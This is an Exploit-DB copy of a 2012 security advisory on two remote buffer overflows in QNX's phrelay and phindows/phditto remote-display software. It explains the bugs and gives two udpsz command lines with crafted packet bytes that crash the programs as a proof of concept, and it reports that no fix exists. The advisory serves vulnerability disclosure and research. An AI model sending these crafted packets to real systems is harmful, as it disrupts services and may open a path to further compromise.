QNX phrelay/phindows/phditto - Multiple Vulnerabilities

EDB-ID:

18864

CVE:


EDB Verified:

Author:

Luigi Auriemma

Type:

dos

Exploit:   /  

Platform:

Windows

Date:

2012-05-11

Vulnerable App: 
#######################################################################

                             Luigi Auriemma

Application:  QNX phrelay/phindows/phditto
              http://www.qnx.com
              http://www.qnx.com/developers/docs/6.5.0/topic/com.qnx.doc.phindows/topic/coverpage.html
              http://www.qnx.com/developers/docs/6.4.1/neutrino/utilities/p/phrelay.html
Versions:     current
Platforms:    QNX Neutrino RTOS and Windows
Bugs:         A] bpe_decompress stack overflow
              B] Photon Session buffer overflow
Exploitation: remote
              A] versus client and maybe server
              B] versus server
Date:         10 May 2012
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


phrelay and phindows/phditto are based on a private protocol that
allows to use the Photon graphical environment of the server (through
the phrelay inetd program) on another machine (phindows, phditto and
any other client).


#######################################################################

=======
2) Bugs
=======

--------------------------------
A] bpe_decompress stack overflow
--------------------------------

The BPE (byte pair encoding) compression uses two stack buffers of 256
bytes called "left" and "right".
The bpe_decompress function used in all the client/server programs of
this protocol is affected by a stack based buffer-overflow caused by
the lack of checks on the data sequentially stored in these two
buffers.


---------------------------------
B] Photon Session buffer overflow
---------------------------------

Buffer-overflow affecting phrelay in the handling of the device file
specified by the client as existing Photon session.


Note: considering that phrelay is not enabled by default and allows to
connect without authentication directly to /dev/photon (the screen
visible phisically on the machine) and phindows/phditto must be
manually pointed to the malicious host for exploiting bug A, this
advisory must be considered only a case study and nothing more.


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18112.zip


A]
at the moment I don't know how to call bpe_decompress on phrelay but I
have verified that the bpe_decompress function is vulnerable at 100%.
the following test works only on phindows/phditto (the proof-of-concept
acts as a server):

  udpsz -C "a5 00 00 01 0000 ffff" -b A -l 0 -T -1 0 4868 1+7+0xffff

B]
  udpsz -C "a5 10 00 00 0000 ffff   1400000008040100000000008002e0010000000000000000000000000000" -b A -T SERVER 4868 1+7+0xffff


#######################################################################

======
4) Fix
======


No fix.


#######################################################################
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services